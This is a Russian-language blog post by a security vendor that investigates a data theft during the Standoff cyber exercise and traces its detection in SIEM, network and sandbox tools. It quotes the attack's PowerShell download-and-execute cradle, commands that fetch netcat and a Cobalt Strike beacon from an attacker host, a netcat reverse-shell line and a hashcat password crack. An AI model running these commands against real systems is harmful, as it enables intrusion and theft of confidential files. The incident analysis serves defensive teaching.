Как стать автором
Обновить
Positive Technologies
Лидер результативной кибербезопасности

Как угнать данные за 15 минут

Время на прочтение5 мин
Количество просмотров4.1K

Привет, Хабр! Осенью состоялась десятая, юбилейная кибербитва Standoff. Три дня десять команд этичных хакеров со всего мира пытались ограбить банк, нарушить работу нефтегазовой отрасли и транспорта или реализовать другие недопустимые события в виртуальном Государстве F, построенном на настоящих физических IT-системах и контроллерах. Шесть команд защитников наблюдали за действиями атакующих и расследовали инциденты. Сегодня мы разберем один из них.

Если вы следите за публикациями в нашем блоге, то знаете, что мы далеко не в первый раз делаем разбор-расследование атак, реализуемых красными во время Standoff. Так вот, на прошлом Standoff входной точкой атаки стало фишинговое письмо. Так случилось и в этот раз: фишинговое письмо послужило причиной серьезной утечки конфиденциальной информации с компьютера руководителя финансового департамента.

Наши аналитики подтверждают: социальная инженерия в тренде у злоумышленников. В III квартале 2022 года число массовых кампаний с использованием социальной инженерии увеличилось на 41% в атаках на организации и на 34% в атаках на частных лиц по сравнению с результатами II квартала. Преимущественно такой рост вызван активным использованием фишинговых комплектов — готовых наборов программ, предназначенных для проведения фишинговой атаки.

Немного теории

Каждая атака состоит из нескольких этапов, которые, в свою очередь, характеризуются набором различных техник, тактик и инструментов, используемых злоумышленниками. Для противостояния атакующим на каждом этапе есть свои превентивные меры и рекомендации по реагированию. С подробным анализом различных сценариев атак можно ознакомиться на сайте Positive Technologies.

Рисунок 1. Жизненный цикл атаки
Рисунок 1. Жизненный цикл атаки

В данном материале мы не будем подробно рассматривать этапы разведки и подготовки, а начнем сразу с разбора этапа доставки и посмотрим, как средства защиты Positive Technologies помогли защитникам Государства F обнаружить вредоносную активность атакующих на разных этапах реализации атаки.

Доставка

Наше расследование берет начало с оповещения в песочнице PT Sandbox, куда на анализ прилетел файл Doc2.doc, извлеченный из письма отправителя rpage@services.stf, который оказался вредоносным по результатам проверки в системе.

Рисунок 2. Сработка PT Sandbox на письмо с установщиком ВПО
Рисунок 2. Сработка PT Sandbox на письмо с установщиком ВПО

Для того чтобы получить больше информации, было решено поискать в MaxPatrol SIEM события отправки письма пользователем rpage@services.stf.

Рисунок 3. Событие отправки пользователем rpage@services.stf письма пользователям l_head@city.stf и o_hall@city.stf
Рисунок 3. Событие отправки пользователем rpage@services.stf письма пользователям l_head@city.stf и o_hall@city.stf

В данном событии нас в первую очередь интересовали получатели письма l_head@city.stf и o_hall@city.stf, чтобы найти события, связанные с этими пользователями.

Эксплуатация и закрепление

Скорее всего, многие знакомы с понятием суффиксов UPN (UserPrincipalName) в Active Directory, но на всякий случай — небольшая справка.

UserPrincipalName (UPN) — это атрибут, который является именем пользователя в формате email-адреса. Например, для записи o_hall@city.stf именем пользователя в домене AD (user logon name) будет o_hall, а city.stf — UPN суффикс.

По правде говоря, UPN не всегда соответствует email-адресу пользователя, но в большинстве случаев это так. Учитывая данный факт, на следующем шаге нашего расследования мы нашли события открытия файла Doc2.doc пользователем o_hall.

Рисунок 4. Событие открытия файла Doc2.doc пользователем o_hall
Рисунок 4. Событие открытия файла Doc2.doc пользователем o_hall

В полезной нагрузке файла Doc2.doc содержалась следующая команда: powershell.exe-ep bypass-enc SQBFAF… (<= зашифрованное содержимое)

В зашифрованном содержимом атакующий инициировал загрузку PowerShell-скрипта ips.ps1 и его запуск при помощи командлета Invoke-Expression (сокращенно IEX):IEX (New-Object Net.WebClient).DownloadString("http://10.126.10.10.13337/ips.ps1")

Данная активность была обнаружена как в MaxPatrol SIEM, так и в PT Network Attack Analysis (PT NAD):

Рисунок 5. Событие загрузки PowerShell-скрипта ips.ps1 в PT NAD
Рисунок 5. Событие загрузки PowerShell-скрипта ips.ps1 в PT NAD

Внимательный читатель мог заметить иконку обезьяны вверху интерфейса PT NAD. Это признак установленного community-плагина SiemMonkey. Наш коллега Константин Грищенко в рамках участия в открытом сообществе Security Experts Community выложил в открытый доступ свои наработки по автоматизации рутинных задач специалистов SOC и оформил их в виде плагина для браузера Google Chrome.

Рисунок 6. Событие MaxPatrol SIEM по загрузке и запуску PowerShell-скрипта ips.ps1
Рисунок 6. Событие MaxPatrol SIEM по загрузке и запуску PowerShell-скрипта ips.ps1

Содержимое же самого ips.ps1:

iwr -uri http://10.126.10.10.13337/nc.exe -outfile C:\Windows\Tasks\nc.exe

iwr -uri http://10.126.10.10.13337/wtf.exe -outfile C:\Windows\Tasks\wtf.exe

C:\Windows\Tasks\nc.exe 10.126.10.10.13338 -e powershell.exe

Первые две команды предназначались для загрузки на атакуемый узел файлов nc.exe и wtf.exe; описание последней команды — в следующем абзаце.

Рисунок 7. События выполнения команд PowerShell-скрипта ips.ps1 в MaxPatrol SIEM
Рисунок 7. События выполнения команд PowerShell-скрипта ips.ps1 в MaxPatrol SIEM

Вердикт PT Sandbox по файлу nc.exe (рис. 8) говорит о загрузке достаточно популярной и универсальной утилиты для исследования сети netcat, которая в нашем расследовании помогла установить обратное соединение на узел атакующего с доступом к командной оболочке PowerShell (третья команда в файле ips.ps1) (рис. 9).

Рисунок 8. Результаты анализа файла nc.exe в PT Sandbox
Рисунок 8. Результаты анализа файла nc.exe в PT Sandbox
Рисунок 9. Событие запуска реверс-шелла на узле comp-5117.city.stf
Рисунок 9. Событие запуска реверс-шелла на узле comp-5117.city.stf

Загруженный файл wtf.exe (рис. 10) после анализа в PT Sandbox (Рисунок 11, 12) оказался специально сгенерированным агентом Cobalt Strike, так называемым маяком (beacon), предназначенным для закрепления на целевом узле.

Чтобы узнать больше, смотрите наш недавний вебинар «PT NAD против Cobalt Strike и Brute Ratel 4».

Cobalt Strike — достаточно известный фреймворк среди злоумышленников (в том числе APT-группировок), предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв. Подробности описанных активностей, связанных с файлом wtf.exe, — ниже.

Рисунок 10. Сессия PT NAD с загрузкой файла wtf.exe
Рисунок 10. Сессия PT NAD с загрузкой файла wtf.exe
Рисунок 11, 12. Результаты анализ файла wtf.exe в PT Sandbox
Рисунок 11, 12. Результаты анализ файла wtf.exe в PT Sandbox

Управление и действие

После установки реверс-шелла атакующий выполнил поиск файлов на целевом узле при помощи команды PowerShell "Get-ChildItem" -Path "../Desktop" и обнаружил архив fin.7z.

Рисунок 13. Поиск файлов на узле comp-5117.city.stf
Рисунок 13. Поиск файлов на узле comp-5117.city.stf
Рисунок 14. Сообщение о найденном файле fin.7z на узле comp-5117.city.stf
Рисунок 14. Сообщение о найденном файле fin.7z на узле comp-5117.city.stf

На последнем шаге атакующий запустил wtf.exe (HTTP-beacon Cobalt Strike) (рис. 15) и выполнил PowerShell-конвейер (рис. 16), в котором файл fin.7z, содержащий конфиденциальную информацию, был сжат и отправлен на узел атакующего (рис. 17).

Рисунок 15. Событие запуска wtf.exe (HTTP-beacon Cobalt Strike) на узле comp-5117.city.stf
Рисунок 15. Событие запуска wtf.exe (HTTP-beacon Cobalt Strike) на узле comp-5117.city.stf
Рисунок 16. Событие запуска конвейера PowerShell по сжатию и потоковой отправке файла
Рисунок 16. Событие запуска конвейера PowerShell по сжатию и потоковой отправке файла
Рисунок 17. Сетевая активность HTTP-beacon Cobalt Strike
Рисунок 17. Сетевая активность HTTP-beacon Cobalt Strike

Таким образом файл с архивом был успешно выгружен с целевого узла атакующими.

P. S. А на той стороне…

Чтобы получить доступ к файлам, хакеры использовали утилиту hashcat и с помощью словаря rockyou.txt, включающего в себя список наиболее популярных и распространенных паролей, подобрали искомый, которым был зашифрован архив (password1):

Так они успешно извлекли файлы с данными из архива, тем самым реализовав недопустимое событие — получение доступа к чувствительным конфиденциальным данным, расположенным на компьютере руководителя финансового департамента.

Вместо вывода

Интересно заметить, что первое событие из расследования, когда фишинговое письмо было отправлено, датировано 23 ноября, 11:30, а последнее с активностью по выгрузке архива — 11:44 того же дня. Таким образом, одной из команд на реализацию недопустимого события потребовалось всего 15 минут. Впечатляет!

FYI

19–20 мая пройдет очередная, еще более масштабная кибербитва Standoff, где атакующие и защитники вновь испытают защищенность инфраструктуры цифрового государства и продемонстрируют возможные цепочки недопустимых событий в разных отраслях. В этом году мы добавили новые сегменты и еще больше недопустимых событий. Узнать о кибербитве больше можно здесь.


Дмитрий Сабадаш

Специалист отдела обнаружения атак экспертного центра безопасности Positive Technologies (PT Expert Security Center)

Теги:
Хабы:
+1
Комментарии0

Публикации

Информация

Сайт
www.ptsecurity.com
Дата регистрации
Дата основания
2002
Численность
1 001–5 000 человек
Местоположение
Россия